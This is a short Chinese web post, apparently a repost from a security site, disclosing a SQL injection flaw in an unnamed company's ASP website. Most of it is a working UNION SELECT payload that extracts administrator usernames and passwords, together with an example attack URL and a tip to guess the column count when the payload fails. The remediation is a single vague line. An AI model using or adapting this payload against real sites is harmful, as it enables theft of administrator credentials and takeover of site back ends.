偶然碰上的,不知版权。
类型:SQL注入
成因:过滤不严,导致可sql注入。
等级:严重
后台:admin/login. asp
exp:
and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
爆不出自行猜下字段。
示例:
http://HdhCmsTest2cto测试数据 /products_show.asp?p_id=30 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
修复:过滤,见本站其它共同问题文章
by Mr.DzY from HdhCmsTest0855.tv
查看更多关于某企业站sql注入漏洞及修复 - 网站安全 - 自学p的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11259